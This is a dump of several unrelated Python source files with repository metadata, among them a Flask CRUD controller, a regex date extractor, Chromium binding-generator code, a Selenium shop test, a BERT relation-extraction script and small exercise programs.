ff22fd675b4bd081cce28221000cb0a7164d32b9 | 2478e5414404819e0629ea5f8ca7a83f836ba733 | /flask_mysql/crud/users_CRUD_modular/flask_app/controllers/users.py | 00c8192aed532e81d42ff27fffe05d848de326ad | [] | no_license | Carpe-liam/python | 07b380ff16c1f6f31cfa1fa4a7ccbd7ae420245b | 23f0c042666356027e59ae582d401896e173bf15 | refs/heads/master | 2023-08-15T03:09:03.037502 | 2021-09-25T04:45:44 | 2021-09-25T04:45:44 | 401,517,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,548 | py | from flask_app import app
from flask import render_template, redirect, request, session, flash
from flask_app.models.user import User
@app.route('/')
def index():
return render_template("index.html")
@app.route('/users')
def read():
users = User.get_all()
print(users)
return render_template("read.html", users=users)
@app.route('/users/new')
def create():
return render_template("create.html")
@app.route('/create_user', methods=["POST"])
def create_user():
data = {
"first_name" : request.form["first_name"],
"last_name" : request.form["last_name"],
"email" : request.form["email"]
}
User.save(data)
return redirect('/users')
@app.route('/users/<int:userID>/edit')
def edit(userID):
data = {
'userID' : userID,
}
user = User.get_one(data)
return render_template("edit.html", user = user)
@app.route('/update/<int:userID>', methods=["POST"])
def update(userID):
data = {
'userID' : userID,
"first_name" : request.form["first_name"],
"last_name" : request.form["last_name"],
"email" : request.form["email"]
}
User.edit(data)
return redirect(f'/users/{userID}')
@app.route('/users/<int:userID>')
def show_info(userID):
data = {
'userID': userID
}
user = User.get_one(data)
return render_template("show_info.html", user = user)
@app.route('/users/<int:userID>/destroy')
def delete(userID):
data = {
'userID' : userID
}
User.delete(data)
return redirect('/users') | [
"alexander.liam.tyler@gmail.com"
] | alexander.liam.tyler@gmail.com |
9b8228925ff7e3762993eca77625969608252ee0 | a3326328b60a125de3cdd473519a3cee751347c6 | /Codigos/ExpresionesRegulares.py | dc1703d0c026add443942a392f95465e1a165bd2 | [] | no_license | villarj/TFM-LogCluster-for-Event-Logs | d1f3fbf5d25f2902203ffc472da5bbd916414ff8 | 1583145141ae87d3cc213c58160b42543a16f2d5 | refs/heads/master | 2020-03-18T06:08:29.933587 | 2018-09-11T17:15:38 | 2018-09-11T17:15:38 | 134,378,407 | 0 | 1 | null | 2018-05-22T07:43:31 | 2018-05-22T07:39:12 | Python | UTF-8 | Python | false | false | 8,169 | py | import regex as re
#Vamos a crear una clase que nos encontrara los patrones deseados.
class findPattern():
#Definimos los patrones que se quieren buscar.
MONTHS_PATTERN = 'january|february|march|april|may|june|july|august|september|october|november|december|jan|feb|mar|apr|may|jun|jul|aug|sep|sept|oct|nov|dec'
DAYS_PATTERN = 'monday|tuesday|wednesday|thursday|friday|saturday|sunday|mon|tue|tues|wed|thur|thurs|fri|sat|sun'
DIGITS_PATTERN = '[^A-Za-z|\.]\d+'
DELIMITERS_PATTERN = '[\-\,\s\_\+\@]+'
TIME_PERIOD_PATTERN = 'a\.m\.|am|p\.m\.|pm'
##Caracteres que se pueden eliminar de los extremos cuando hay cadenas combinadas.
STRIP_CHARS = ' \n\t:-.,_'
#Patron definido para encontrar la hora.
TIME_PATTERN = """
(?P<time>
## Captures in format XX:YY(:ZZ)
(
(?P<hours>\d{{2,2}})
\:
(?P<minutes>\d{{1,2}})
\:
(?P<seconds>\d{{1,2}})
\.
(?P<miliseconds>\d{{3,3}})
\s*\+
(?P<resto>\d{{2,2}})
\:
(?P<resto2>\d{{2,2}})
)
|
(
(?P<hours>\d{{1,2}})
\:
(?P<minutes>\d{{1,2}})
(\:(?<seconds>\d{{1,2}}))
\s*
(?P<time_periods>{time_periods})?
)
)
""".format(
time_periods=TIME_PERIOD_PATTERN
)
DATES_PATTERN = """
(
## Grab any digits
(
(?P<months>{months})
(?P<delimiters>{delimiters})
(?P<days>\d{{1,2}})
(?P<delimiters>{delimiters})?
(?P<year>\d{{4}})?
)
|
(
(?P<days>\d{{1,2}})
(?P<delimiters>{delimiters})
(?P<months>{months})
)
|
(
(?P<year>\d{{2,4}})
(?P<delimiters>{delimiters})
(?P<months>\d{{1,2}})
(?P<delimiters>{delimiters})
(?P<days>\d{{1,2}})
)
)
"""
DATES_PATTERN = DATES_PATTERN.format(
digits=DIGITS_PATTERN,
months=MONTHS_PATTERN,
delimiters=DELIMITERS_PATTERN
)
#Compilamos para hacer las expresiones regulares.
#Para fechas
DATE_REGEX = re.compile(DATES_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL | re.VERBOSE)
#Para horas
TIME_REGEX = re.compile(TIME_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL | re.VERBOSE)
#Creamos el constructor de la clase
def __init__(self, base_date=None):
self.base_date = base_date
#Creamos un metodo que busque las fechas.
def find_dates(self, text, source=False, index=False, strict=False):
for date_string, indices, captures in self.extract_date_strings(text, strict=strict):
#as_dt = self.parse_date_string(date_string, captures)
if date_string is None:
## Dateutil couldn't make heads or tails of it
## move on to next
continue
returnables = (date_string,)
if source:
returnables = returnables + (date_string,)
if index:
returnables = returnables + (indices,)
if len(returnables) == 1:
returnables = returnables[0]
yield returnables
#Funcion que escane el texto buscando formatos de fechas
def extract_date_strings(self, text, strict=False):
#Buscamos en el texto las posibles cadenas candidatas a ser una fecha.
for match in self.DATE_REGEX.finditer(text):
match_str = match.group(0)
indices = match.span(0)
## Get individual group matches
captures = match.capturesdict()
months = captures.get('months')[0]
days = captures.get('days')[0]
if(len(months)<=2):
months=int(months)
if(len(days)<=2):
days=int(days)
if(type(months)==unicode):
months=str(months)
if((type(months)==int and months<=12) or type(months)==str):
if((type(days)==int and days<=31) or type(days)==str):
## sanitize date string
## replace unhelpful whitespace characters with single whitespace
match_str = re.sub('[\n\t\s\xa0]+', ' ', match_str)
match_str = match_str.strip(self.STRIP_CHARS)
## Save sanitized source string
yield match_str, indices, captures
def find_time(self, text, source=False, index=False, strict=False):
for date_string, indices, captures in self.extract_time_strings(text, strict=strict):
if date_string is None:
## Dateutil couldn't make heads or tails of it
## move on to next
continue
returnables = (date_string,)
if source:
returnables = returnables + (date_string,)
if index:
returnables = returnables + (indices,)
if len(returnables) == 1:
returnables = returnables[0]
yield returnables
#Funcion que busca formato de fechas por el texto y lo extrae.
def extract_time_strings(self, text, strict=False):
#Buscamos en el texto las posibles cadenas candidatas a ser una hora.
for match in self.TIME_REGEX.finditer(text):
#Almacenamos en una variable la cadena candidata encontrada.
match_str = match.group(0)
#Almacenamos en la variable indices (tupla) los indices en el cual empieza la cadena y
#en el que termina.
indices = match.span(0)
#Obtenemos los resultados de forma indidual para realizar las comprobaciones.
captures = match.capturesdict()
horas = int(captures.get('hours')[0])
minutos=int(captures.get('minutes')[0])
segundos = captures.get('seconds')
if(len(segundos)>0):
segundos=int(segundos[0])
#Comprobamos que las horas, minutos y segundos tienen valores correctos.
if(horas >=0 and horas<24 and minutos>=0 and minutos<=59 and((type(segundos)==int and segundos>=0 and segundos<60) or type(segundos)==list)):
#Limpiamos el string de fechas
match_str = re.sub('[\n\t\s\xa0]+', ' ', match_str)
#Reemplazamos el conjunto de espacios en blanco inutiles por espacios en blanco individuales.
match_str = match_str.strip(self.STRIP_CHARS)
## Save sanitized source string
yield match_str, indices, captures
#Buscamos las fechas
def find_dates(text,source=False,index=False,strict=False,base_date=None):
date_finder = findPattern(base_date=base_date)
return date_finder.find_dates(text, source=source, index=index, strict=strict)
def find_time(text,source=False,index=False,strict=False,base_date=None):
"""
Extract datetime strings from text
:param text:
A string that contains one or more natural language or literal
datetime strings
:type text: str|unicode
:param source:
Return the original string segment
:type source: boolean
:param index:
Return the indices where the datetime string was located in text
:type index: boolean
:param strict:
Only return datetimes with complete date information. For example:
`July 2016` of `Monday` will not return datetimes.
`May 16, 2015` will return datetimes.
:type strict: boolean
:param base_date:
Set a default base datetime when parsing incomplete dates
:type base_date: datetime
:return: Returns a generator that produces :mod:`datetime.datetime` objects,
or a tuple with the source text and index, if requested
"""
time_finder = findPattern(base_date=base_date)
return time_finder.find_time(text, source=source, index=index, strict=strict) | [
"villarj@ifca.unican.es"
] | villarj@ifca.unican.es |
674ded63f9ecd7d257210fd5b0bc3cc5693b7ef1 | 2834f98b53d78bafc9f765344ded24cf41ffebb0 | /third_party/blink/renderer/bindings/scripts/bind_gen/codegen_context.py | 8b06e8788988d91bc42b0326dd58240ca4dcf6e6 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0"
] | permissive | cea56/chromium | 81bffdf706df8b356c2e821c1a299f9d4bd4c620 | 013d244f2a747275da76758d2e6240f88c0165dd | refs/heads/master | 2023-01-11T05:44:41.185820 | 2019-12-09T04:14:16 | 2019-12-09T04:14:16 | 226,785,888 | 1 | 0 | BSD-3-Clause | 2019-12-09T04:40:07 | 2019-12-09T04:40:07 | null | UTF-8 | Python | false | false | 7,406 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
from . import name_style
from .path_manager import PathManager
class CodeGenContext(object):
"""
Represents a context of code generation.
Note that this is not relevant to Mako template context or any contexts.
Also note that CodeGenContext's attributes will be global template
variables. |CodeGenContext.interface| will be available in templates as
"${interface}".
"""
# "for_world" attribute values
MAIN_WORLD = "main"
ALL_WORLDS = "all"
@classmethod
def init(cls):
"""Initialize the class. Must be called exactly once."""
assert not hasattr(cls, "_was_initialized"), "Do not call twice."
cls._was_initialized = True
# List of
# attribute name: default value
cls._context_attrs = {
# Top-level definition
"callback_function": None,
"callback_interface": None,
"dictionary": None,
"enumeration": None,
"interface": None,
"namespace": None,
"typedef": None,
"union": None,
# Class-member-ish definition
"attribute": None,
"attribute_get": False,
"attribute_set": False,
"constant": None,
"constructor": None,
"constructor_group": None,
"dict_member": None,
"operation": None,
"operation_group": None,
# Main world or all worlds
"for_world": cls.ALL_WORLDS,
}
# List of computational attribute names
cls._computational_attrs = (
"class_like",
"function_like",
"idl_definition",
"idl_location",
"idl_location_and_name",
"idl_name",
"is_return_by_argument",
"may_throw_exception",
"member_like",
"property_",
"return_type",
"v8_class",
)
# Define public readonly properties of this class.
for attr in cls._context_attrs.iterkeys():
def make_get():
_attr = cls._internal_attr(attr)
def get(self):
return getattr(self, _attr)
return get
setattr(cls, attr, property(make_get()))
@staticmethod
def _internal_attr(attr):
return "_{}".format(attr)
def __init__(self, **kwargs):
assert CodeGenContext._was_initialized
for arg in kwargs.iterkeys():
assert arg in self._context_attrs, "Unknown argument: {}".format(
arg)
for attr, default_value in self._context_attrs.iteritems():
value = kwargs[attr] if attr in kwargs else default_value
assert (default_value is None
or type(value) is type(default_value)), (
"Type mismatch at argument: {}".format(attr))
setattr(self, self._internal_attr(attr), value)
def make_copy(self, **kwargs):
"""
Returns a copy of this context applying the updates given as the
arguments.
"""
for arg in kwargs.iterkeys():
assert arg in self._context_attrs, "Unknown argument: {}".format(
arg)
new_object = copy.copy(self)
for attr, new_value in kwargs.iteritems():
old_value = getattr(self, attr)
assert old_value is None or type(new_value) is type(old_value), (
"Type mismatch at argument: {}".format(attr))
setattr(new_object, self._internal_attr(attr), new_value)
return new_object
def template_bindings(self):
"""
Returns a bindings object to be passed into
|CodeNode.add_template_vars|. Only properties with a non-None value are
bound so that it's easy to detect invalid use cases (use of an unbound
template variable raises a NameError).
"""
bindings = {}
for attr in self._context_attrs.iterkeys():
value = getattr(self, attr)
if value is not None:
bindings[attr] = value
for attr in self._computational_attrs:
value = getattr(self, attr)
if value is not None:
bindings[attr.strip("_")] = value
return bindings
@property
def class_like(self):
return (self.callback_interface or self.dictionary or self.interface
or self.namespace)
@property
def function_like(self):
return (self.callback_function or self.constructor or self.operation)
@property
def idl_definition(self):
return (self.callback_function or self.callback_interface
or self.dictionary or self.enumeration or self.interface
or self.namespace or self.typedef or self.union)
@property
def idl_location(self):
idl_def = self.member_like or self.idl_definition
if idl_def:
location = idl_def.debug_info.location
text = PathManager.relpath_to_project_root(location.filepath)
if location.line_number is not None:
text += ":{}".format(location.line_number)
return text
return "<<unknown path>>"
@property
def idl_location_and_name(self):
return "{}: {}".format(self.idl_location, self.idl_name)
@property
def idl_name(self):
member = self.member_like or self.property_
if member:
return "{}.{}".format(self.class_like.identifier,
member.identifier)
if self.idl_definition:
return self.idl_definition.identifier
return "<<unknown name>>"
@property
def is_return_by_argument(self):
if self.return_type is None:
return None
return_type = self.return_type.unwrap()
return return_type.is_dictionary or return_type.is_union
@property
def may_throw_exception(self):
if not self.member_like:
return None
ext_attr = self.member_like.extended_attributes.get("RaisesException")
if not ext_attr:
return False
return (not ext_attr.values
or (self.attribute_get and "Getter" in ext_attr.values)
or (self.attribute_set and "Setter" in ext_attr.values))
@property
def member_like(self):
return (self.attribute or self.constant or self.constructor
or self.dict_member or self.operation)
@property
def property_(self):
return (self.attribute or self.constant or self.constructor_group
or self.dict_member or self.operation_group)
@property
def return_type(self):
if self.attribute_get:
return self.attribute.idl_type
if self.callback_function:
return self.callback_function.return_type
if self.operation:
return self.operation.return_type
return None
@property
def v8_class(self):
if not self.idl_definition:
return None
return name_style.class_("v8", self.idl_definition.identifier)
CodeGenContext.init()
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
3d976c2385b5fd2a293ffb59931822dc483ebdf8 | 920202f7c93d8fe2e1063c8576a3daa0d2d61864 | /test_case_6.py | 8c6a03748b2f01c8b3e75de475baa3f5921a7c2f | [] | no_license | JuliaFedyaeva/autotests_python | 3d1f2f25096345c3894d90746d39a7f08442f82e | b777a5bbc191c34ab8b5dccefcceef821aae2c79 | refs/heads/master | 2022-12-26T14:00:18.930862 | 2020-09-28T11:34:06 | 2020-09-28T11:34:06 | 294,995,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,383 | py | import locators as _locators
import pytest
import utils
import test_data
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
@pytest.mark.xfail(reason="It's a negative test")
def test_payment_without_card(browser):
# Data
heading_shipping_locator = 'div.sub-header h1'
country_locator = 'select#id_country'
heading_payment_locator = 'div.sub-header h1'
page_payment_heading = 'Введите параметры платежа'
page_shipping_heading = 'Адрес доставки'
# Arrange
browser.get(_locators.main_page_link)
utils.find(browser, _locators.login_link).click()
utils.authorizate(browser, test_data.email, test_data.password)
WebDriverWait(browser, 12).until(
EC.presence_of_element_located((By.XPATH, _locators.success_message_locator))
)
success_message_text = utils.find_xpath(browser, _locators.success_message_locator).text
assert _locators.success_message in success_message_text, \
"Search success message '%s' should contain text '%s'" % (success_message_text, _locators.success_message)
WebDriverWait(browser, 12).until(
EC.presence_of_element_located((By.XPATH, _locators.catalog_link))
)
utils.find_xpath(browser, _locators.catalog_link).click()
page_catalog_detector = utils.find(browser, _locators.catalog_heading_locator).text
assert _locators.catalog_heading in page_catalog_detector, \
"Search heading '%s' should contain text '%s'" % (page_catalog_detector, _locators.catalog_heading)
utils.click_add_to_cart(browser)
WebDriverWait(browser, 12).until(
EC.presence_of_element_located((By.CSS_SELECTOR, _locators.button_view_cart))
)
utils.view_cart(browser)
# Steps
utils.find(browser, _locators.button_to_order).click()
page_shipping_detector = utils.find(browser, heading_shipping_locator).text
assert page_shipping_heading in page_shipping_detector, \
"Search heading '%s' should contain text '%s'" % (page_shipping_detector, heading_shipping_locator)
WebDriverWait(browser, 12).until(
EC.presence_of_element_located((By.CSS_SELECTOR, heading_shipping_locator))
)
utils.set_address(browser, test_data.name, test_data.lastname, test_data.address, test_data.city, test_data.postcode, country_locator, test_data.country)
utils.click_next_step_order(browser)
# тут по идее должна быть проверка способа доставки, но нет такого раздела почему-то,
# сразу перекидывает на шаг оплаты
WebDriverWait(browser, 12).until(
EC.presence_of_element_located((By.CSS_SELECTOR, heading_payment_locator))
)
page_payment_detector = utils.find(browser, heading_payment_locator).text
assert page_payment_heading in page_payment_detector
# здесь поля оплаты остаются пустыми
WebDriverWait(browser, 12).until(
EC.presence_of_element_located((By.CSS_SELECTOR, _locators.link_to_payment))
)
# Assert
button_disabled = _locators.link_to_payment.getAttribute('disabled')
assert button_disabled == "true", "No disabled button on payment page"
button_disabled.click()
| [
"julia.fedyaeva@mail.ru"
] | julia.fedyaeva@mail.ru |
3288a5d507b48c805c130854b0793d855808c410 | 11c2fae3b7a8547fe31c2340192f3183bc86ebae | /test/relation_extract_test.py | 67ad1f808570ec6a4fc4a617148c2f069e740748 | [
"Apache-2.0"
] | permissive | SusannaWull/bert_seq2seq | 86ff2229d9c6048475a958477e873d1dce6e19a1 | 5e2991a004a5f1ceeb76571f33c796355d10b8f7 | refs/heads/master | 2023-07-01T14:39:29.481005 | 2021-08-05T06:23:08 | 2021-08-05T06:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,484 | py | import torch
import torch.nn as nn
import sys
sys.path.append("/Users/xingzhaohu/Downloads/code/python/ml/ml_code/bert/bert_seq2seq")
from torch.optim import Adam
import pandas as pd
import numpy as np
import os
import json
import time
import bert_seq2seq
from bert_seq2seq.tokenizer import Tokenizer, load_chinese_base_vocab
from bert_seq2seq.utils import load_bert
relation_extrac_model = "./state_dict/bert_model_relation_extrac.bin"
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
vocab_path = "./state_dict/roberta_wwm_vocab.txt" # roberta模型字典的位置
model_name = "roberta" # 选择模型名字
# model_path = "./state_dict/bert-base-chinese-pytorch_model.bin" # roberta模型位
# 加载字典
word2idx = load_chinese_base_vocab(vocab_path, simplfied=False)
tokenizer = Tokenizer(word2idx)
idx2word = {v: k for k, v in word2idx.items()}
predicate2id, id2predicate = {}, {}
with open('./corpus/三元组抽取/all_50_schemas') as f:
for l in f:
l = json.loads(l)
if l['predicate'] not in predicate2id:
id2predicate[len(predicate2id)] = l['predicate']
predicate2id[l['predicate']] = len(predicate2id)
def search(pattern, sequence):
"""从sequence中寻找子串pattern
如果找到,返回第一个下标;否则返回-1。
"""
n = len(pattern)
for i in range(len(sequence)):
if sequence[i:i + n] == pattern:
return i
return -1
def search_subject(token_ids, subject_labels):
# subject_labels: (lens, 2)
if type(subject_labels) is torch.Tensor:
subject_labels = subject_labels.numpy()
if type(token_ids) is torch.Tensor:
token_ids = token_ids.cpu().numpy()
subjects = []
subject_ids = []
start = -1
end = -1
for i in range(len(token_ids)):
if subject_labels[i, 0] > 0.5:
start = i
for j in range(len(token_ids)):
if subject_labels[j, 1] > 0.5:
subject_labels[j, 1] = 0
end = j
break
if start == -1 or end == -1:
continue
subject = ""
for k in range(start, end + 1):
subject += idx2word[token_ids[k]]
# print(subject)
subject_ids.append([start, end])
start = -1
end = -1
subjects.append(subject)
return subjects, subject_ids
def search_object(token_ids, object_labels):
objects = []
if type(object_labels) is torch.Tensor:
object_labels = object_labels.numpy()
if type(token_ids) is torch.Tensor:
token_ids = token_ids.cpu().numpy()
# print(object_labels.sum())
start = np.where(object_labels[:, :, 0] > 0.5)
end = np.where(object_labels[:, :, 1] > 0.5)
# print(start)
# print(end)
for _start, predicate1 in zip(*start):
for _end, predicate2 in zip(*end):
if _start <= _end and predicate1 == predicate2:
object_text = ""
for k in range(_start, _end + 1):
# print(token_ids(k))
object_text += idx2word[token_ids[k]]
objects.append(
(id2predicate[predicate1], object_text)
)
break
return objects
if __name__ == "__main__":
# 定义模型
bert_model = load_bert(word2idx, model_class="relation_extrac", model_name=model_name, target_size=len(predicate2id))
bert_model.eval()
bert_model.set_device(device)
# ## 加载预训练的模型参数~
checkpoint = torch.load(relation_extrac_model, map_location="cpu")
# print(checkpoint)
bert_model.load_all_params(model_path=relation_extrac_model, device=device)
text = ["查尔斯·阿兰基斯(Charles Aránguiz),1989年4月17日出生于智利圣地亚哥,智利职业足球运动员,司职中场,效力于德国足球甲级联赛勒沃库森足球俱乐部",
"《星空黑夜传奇》是连载于起点中文网的网络小说,作者是啤酒的罪孽",
"《李烈钧自述》是2011年11月1日人民日报出版社出版的图书,作者是李烈钧",
"杨铁心和郭啸天兄弟二人在牛家村的农屋里喝酒,他们的岳飞大将军在风波亭被害之事,二人希望能够像岳飞大将军一样精忠报国。"]
for d in text:
with torch.no_grad():
token_ids_test, segment_ids = tokenizer.encode(d, max_length=256)
token_ids_test = torch.tensor(token_ids_test, device=device).view(1, -1)
# 先预测subject
pred_subject = bert_model.predict_subject(token_ids_test, device=device)
pred_subject = pred_subject.squeeze(0)
subject_texts, subject_idss = search_subject(token_ids_test[0], pred_subject.cpu())
if len(subject_texts) == 0:
print("no subject predicted~")
for sub_text, sub_ids in zip(subject_texts, subject_idss):
print("subject is " + str(sub_text))
sub_ids = torch.tensor(sub_ids, device=device).view(1, -1)
# print("sub_ids shape is " + str(sub_ids))
object_p_pred = bert_model.predict_object_predicate(token_ids_test, sub_ids, device=device)
res = search_object(token_ids_test[0], object_p_pred.squeeze(0).cpu())
print("p and obj is " + str(res))
| [
"920232796@qq.com"
] | 920232796@qq.com |
eb82622e182e44628fdc26aef95db713eff0f165 | 326c1216782633f493d15730150d8f41db177e2f | /data_process.py | ccc79a77b118be7713254d2c88975e5168bb9486 | [] | no_license | JiaojiaoYe1994/face-segmentation | 0cfc10776cd5deb8974530d3fd10a417edb00237 | bdb8ffccf7d3aaa6785d7869fd7a7ddb7b056764 | refs/heads/master | 2022-12-21T18:42:52.917032 | 2020-09-22T09:34:01 | 2020-09-22T09:34:01 | 292,716,024 | 0 | 0 | null | 2020-09-04T01:12:31 | 2020-09-04T01:12:30 | null | UTF-8 | Python | false | false | 1,696 | py | '''
This script works for dataset preparation. The dataset used in this project comes from multiple source
and each dataset has different format. We process each dataset accordingly and finally combine them to the final
dataset.
Dataset Source:
1. CelebA: https://www.kaggle.com/jessicali9530/celeba-dataset
2. Exemplar-Based Face Parsing: http://pages.cs.wisc.edu/~lizhang/projects/face-parsing/
3. Labeled Faces in the Wild: http://vis-www.cs.umass.edu/lfw/
The final train dataset consists of the following folder:
/images
/masks
'''
import os
import glob
import sys
import cv2
from PIL import Image
import numpy as np
root = '~/SmithCVPR2013_dataset_resized'
# img_pth = os.path.join(root, 'images')
# label_dir = os.path.join(root, 'labels')
# mask_dir = '/home/jiaojiao/jiaojiao/project/dubhe/face-segmentation/datasets/SmithCVPR2013_dataset_resized/masks'
label_pth = glob.glob(label_pth+'/*')
print('Dataset size: ', len(labels_files))
label = glob.glob(labels_files[0]+'/*[1-9].png')
def helen_combine_seg(path):
label = glob.glob(path + '/*[1-9].png')
name = label[0].split('/')[-2]
mask = np.zeros(np.array(Image.open(label[0])).shape)
for f_p in label:
bmp = Image.open(f_p)
# bmp.show()
mask += np.array(bmp)
mask = Image.fromarray(np.uint8(mask))
save_path = os.path.join(mask_dir, name + '.bmp')
mask.save(save_path)
def helen_process(root):
label_dir = os.path.join(root, 'labels')
mask_dir = os.path.join(root, 'masks')
label_pth = glob.glob(label_dir + '/*')
for p in labels_pth:
helen_combine_seg(p)
def main():
helen_process(root)
if __name__ == "__main__":
main() | [
"jiaojiaoye2016@gmail.com"
] | jiaojiaoye2016@gmail.com |
60d2fb6c1f5ea8c3c6bb6cfceeb60d70f07d871f | 19f698ab74cba74ae52c780f5986d273fb319308 | /SWExpertAcademy/D4/1232.py | 209942da9fe5a71e6e5177f96a34335d03fa5316 | [] | no_license | naye0ng/Algorithm | 15023f1070eb7cc5faca9cf7154af2ecffab92c2 | 1e8848e3e2574b01dc239212ea084b0a4837bc03 | refs/heads/master | 2021-06-25T14:18:46.117411 | 2020-10-16T10:47:37 | 2020-10-16T10:47:37 | 149,326,399 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,351 | py | """
1232.사칙연산
"""
import sys
sys.stdin = open('input.txt','r')
class Stack() :
def __init__(self):
self.top = -1
self. stack = []
def push(self, data):
self.stack += [data]
self.top +=1
def pop(self):
temp = self.stack[self.top]
self.stack = self.stack[:self.top]
self.top -= 1
return temp
def inorder(t) :
if t :
inorder(tree[t][1])
inorder(tree[t][2])
if type(tree[t][0]) == int :
stack.push(tree[t][0])
else :
x = stack.pop()
y = stack.pop()
if tree[t][0] == '+' :
stack.push(y+x)
elif tree[t][0] == '-' :
stack.push(y-x)
elif tree[t][0] == '*' :
stack.push(y*x)
elif tree[t][0] == '/' :
stack.push(y//x)
for test_case in range(1,11) :
N = int(input())
tree = [ [0]*3 for _ in range(N+1) ]
for _ in range(N) :
node = input().split()
if len(node) == 2 :
tree[int(node[0])][0] = int(node[1])
else :
tree[int(node[0])][0] = node[1]
tree[int(node[0])][1] = int(node[2])
tree[int(node[0])][2] = int(node[3])
stack = Stack()
inorder(1)
print('#{} {}'.format(test_case, stack.pop())) | [
"nayeong_e@naver.com"
] | nayeong_e@naver.com |
060b3c3a67634fc563621bc8ff9a56a6e126e163 | 2c0d223b8f630dfb9a6e90e5efd7785cb90379f4 | /DataMonitor/monitor/monitor_order_add.py | 1844dd10772cbd6a1b68e778edae178d4ff5ccae | [] | no_license | hegajun/Analysis | 31ead4e0cf2a2791351386be81888b7dd25b9cbb | e3f2334b3be0a600bf185469be6bd52af172f302 | refs/heads/master | 2020-03-13T19:03:30.480132 | 2013-05-29T03:16:13 | 2013-05-29T03:16:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,347 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: zhoujiebing
@contact: zhoujiebing@maimiaotech.com
@date: 2012-08-25 16:18
@version: 0.0.0
@license: Copyright alibaba-inc.com
@copyright: Copyright alibaba-inc.com
"""
import re
import urllib2
import sys
if __name__ == '__main__':
sys.path.append('../../')
from DataMonitor.conf.settings import CACHE_DIR, ORDER_CHECK_SETTING
from CommonTools.ztc_order_tools import ZtcOrder
def get_record_order(id_name):
file_date = file(CACHE_DIR+id_name+'_order').read().split('\n')
order_type = file_date[0].split(',')
if len(order_type) >= 3:
return (order_type[0], order_type[1], int(order_type[2]))
else:
return ('nick','time', 3)
def write_record_order(id_name, nick, time, num):
file_obj = file(CACHE_DIR+id_name+'_order', 'w')
file_obj.write('%s,%s,%d\n' % (nick, time, num))
file_obj.close()
def monitor_order_add(id_name='省油宝', id='ts-1796606'):
return_info = ''
order_list = get_first_page_order(id)
(old_nick, old_time, num) = get_record_order(id)
if num >= 3:
first_order = order_list[0]
add_order = 0
for order in order_list:
if old_nick == order['nick'] and old_time == order['payTime']:
break
add_order += 1
num = 0
if add_order < ORDER_CHECK_SETTING['ADD']:
return_info = id_name+'30分钟内新增订单数为:%d, 低于警报界限:%d.\n' % (add_order, ORDER_CHECK_SETTING['ADD'])
print 'add_order:',add_order
write_record_order(id, first_order['nick'], first_order['payTime'], 0)
else:
num += 1
write_record_order(id, old_nick, old_time, num)
return return_info
def getWebPage(url):
wp = urllib2.urlopen(url)
content = wp.read()
return content
def getUrl(id, day):
url = 'http://fuwu.taobao.com/serv/rencSubscList.do?serviceCode=' + id + '¤tPage=' + day + '&pageCount=' + day
return url
def get_first_page_order(id):
for day in range(1,2):
url = getUrl(id, str(day))
content = getWebPage(url).split('\n')
order_dict = ZtcOrder.eval_ztc_order(content[1])
order_list = order_dict['data']
return order_list
if __name__ == '__main__':
print 'monitor_order_add:', monitor_order_add()
| [
"zhoujiebing@maimiaotech.com"
] | zhoujiebing@maimiaotech.com |
b81ad17a0e498eb428d635565a32212e699fc4a2 | 70150fa79dcc0f92140f4144f0997fc43ff50bff | /lab_02_01.py | 07134ec74a577d0e60e8871bd2973e3e5b911b18 | [] | no_license | Captain-on-time/Info-Lab-5 | 2417905d6a69309dd27a49d6fa2d247165016597 | 63bff1a396f1682b5119f9c368e3a69a0dadba46 | refs/heads/main | 2023-02-23T21:23:41.062024 | 2021-01-24T15:24:30 | 2021-01-24T15:24:30 | 332,482,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | num = int(input("How many times have you been to the Hermitage? "))
if num > 0:
print("Wonderful!")
print("I hope you liked this museum!")
else:
print("You should definitely visit the Hermitage!")
course = int(input("What is your course number? "))
if course == 1:
print("You are just at the beginning!")
elif course == 2:
print("You learned many things, but not all of them!")
elif course == 3:
print("The basic course is over, it's time for professional disciplines!")
else:
print("Oh! You need to hurry! June is the month of thesis defense")
x = 5
y = 12
if y % x > 0 :
print("%d cannot be evenly divided by %d" % (y,x))
z = 3
x = "{} is a divider of {}".format(z,y) if y%z==0 else "{} is not a divider of {}".format(z,y)
print(x)
print("\n\n")
p = 18;
if p > 10:
print(p)
print(p) if p > 10 else ""
a = 157
b = 525
if a > b:
print(a%b)
elif a < b:
print(b%a)
else:
print(a*b) | [
"noreply@github.com"
] | Captain-on-time.noreply@github.com |
3467fc55a3481e62825fbe2bdf75fd363c82e265 | d05a59feee839a4af352b7ed2fd6cf10a288a3cb | /xlsxwriter/test/comparison/test_textbox37.py | fcee2dcd1cb25fb93119b273ee97058e41f7bafb | [
"BSD-2-Clause-Views"
] | permissive | elessarelfstone/XlsxWriter | 0d958afd593643f990373bd4d8a32bafc0966534 | bb7b7881c7a93c89d6eaac25f12dda08d58d3046 | refs/heads/master | 2020-09-24T06:17:20.840848 | 2019-11-24T23:43:01 | 2019-11-24T23:43:01 | 225,685,272 | 1 | 0 | NOASSERTION | 2019-12-03T18:09:06 | 2019-12-03T18:09:05 | null | UTF-8 | Python | false | false | 915 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
